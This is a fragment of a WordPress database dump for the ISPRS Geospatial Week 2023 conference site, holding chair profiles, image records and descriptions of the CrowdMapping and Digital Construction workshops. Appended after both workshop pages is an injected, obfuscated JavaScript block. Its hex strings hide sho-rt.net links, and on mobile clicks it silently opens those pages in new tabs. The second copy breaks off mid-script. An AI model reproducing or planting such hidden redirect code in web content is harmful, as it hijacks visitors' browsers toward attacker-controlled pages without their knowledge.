(2706,1,'2022-10-09 04:34:26','2022-10-09 04:34:26','','w91','','inherit','open','closed','','w91','','','2022-10-14 14:05:45','2022-10-14 14:05:45','',2705,'https://gsw2023.com/wp-content/uploads/2022/10/w91.jpg',0,'attachment','image/jpeg',0),
(2707,1,'2022-10-09 04:37:34','2022-10-09 04:37:34','','Lucy W. Mburu<br>College of Technology<br>KCA University,<br>Kenya<br>(ICWG IV/III)','','publish','closed','closed','','lucy-w-mburucollege-of-technologykca-universitykenyaicwg-iv-iii','','','2022-10-14 14:05:22','2022-10-14 14:05:22','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2707',0,'dt_team','',0),
(2708,1,'2022-10-09 04:36:26','2022-10-09 04:36:26','','w92','','inherit','open','closed','','w92','','','2022-10-14 14:05:12','2022-10-14 14:05:12','',2707,'https://gsw2023.com/wp-content/uploads/2022/10/w92.jpg',0,'attachment','image/jpeg',0),
(2709,1,'2022-10-09 04:39:08','2022-10-09 04:39:08','','Xuke Hu<br>Institute of Data Science<br>German Aerospace Center (DLR),<br>Germany<br>(ICWG IV/III)','','publish','closed','closed','','xuke-huinstitute-of-data-sciencegerman-aerospace-center-dlrgermanyicwg-iv-iii','','','2022-10-09 04:39:42','2022-10-09 04:39:42','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2709',0,'dt_team','',0),
(2710,1,'2022-10-09 04:38:15','2022-10-09 04:38:15','','w93','','inherit','open','closed','','w93','','','2022-10-09 04:38:15','2022-10-09 04:38:15','',2709,'https://gsw2023.com/wp-content/uploads/2022/10/w93.jpg',0,'attachment','image/jpeg',0),
(2711,1,'2022-10-09 04:41:44','2022-10-09 04:41:44','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"45\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align:justify; color:red;\" &gt;<strong>Themes of event:</strong></p>\n<h6><strong>⦁ Land use and land cover mapping using crowdsourcing</strong><br />\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong><br />\n<strong>⦁ Integration of VGI and deep learning</strong><br />\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong><br />\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong><br />\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong><br />\n<strong>⦁ 3D building reconstruction from VGI data</strong><br />\n<strong>⦁ Crowdsourcing-based indoor mapping</strong><br />\n<strong>⦁ Building semantic enrichment using social media data</strong><br />\n<strong>⦁ OpenStreetMap enrichment</strong><br />\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong><br />\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong><br />\n<strong>⦁ Automatically mapping human settlements in rural areas</strong><br />\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong><br />\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong><br />\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\n<h6><strong>⦁ João Porto de Albuquerque, University of Glasgow, UK</strong><br />\n<strong>⦁ Jamal Jokar Arsanjani, Aalborg University, Denmark</strong><br />\n<strong>⦁ Ana Basiri, University of Glasgow, UK</strong><br />\n<strong>⦁ Lucy Bastin, Aston University, UK</strong><br />\n<strong>⦁ Alexander Brenning, Friedrich Schiller University, Germany</strong><br />\n<strong>⦁ Cidália Fonte, Universidade de Coimbra, Portugal</strong><br />\n<strong>⦁ Jukka Krisp, Universität Augsburg, Germany</strong><br />\n<strong>⦁ Pascal Neis, University of Applied Sciences Mainz, Germany</strong><br />\n<strong>⦁ Tessio Novack, University of Warwick, UK</strong><br />\n<strong>⦁ Bernd Resch, University of Salzburg, Austria</strong><br />\n<strong>⦁ Hansi Senaratne, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Bisheng Yang, Wuhan University, China</strong><br />\n<strong>⦁ Xiaoxiang Zhu, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Alexlander Zipf, Universität Heidelberg, Germany</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Supporting ISPRS Working Groups:</strong></h5>\n<h6><strong>⦁ WG I/4: LiDAR, Laser Altimetry and Sensor Integration</strong></h6>\n<h6>\n<strong>⦁ WG VI/4: Data management for Spatial Scenarios</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2022-10-09 04:41:44','2022-10-09 04:41:44','',2697,'https://gsw2023.com/?p=2711',0,'revision','',0),
(2712,1,'2022-10-09 04:43:56','2022-10-09 04:43:56','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Digital Construction</span></strong></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1675605216108-156a50b7fb7c5ad86ecaddcdf8351fa4-3\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\r\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\r\n<h6><strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\r\n<h6><strong>⦁ Progress monitoring of large construction projects</strong></h6>\r\n<h6><strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\r\n<h6><strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\r\n<h6><strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\r\n<h6><strong>⦁ Computer vision in digital construction</strong></h6>\r\n<h6><strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\r\n<h6><strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\r\n<h6><strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\r\n<h6><strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\r\n<h6><strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\r\n<h6><strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\r\n<h6><strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\r\n<h6><strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\r\n<h6><strong>⦁ Qian Wang, Southeast University, China</strong></h6>\r\n<h6><strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\r\n<h6><strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\r\n<h6><strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\r\n<h6><strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\r\n<h6><strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\r\n<h6><strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\r\n<h6><strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\r\n<h6><strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\r\n<h6><strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\r\n<h6><strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 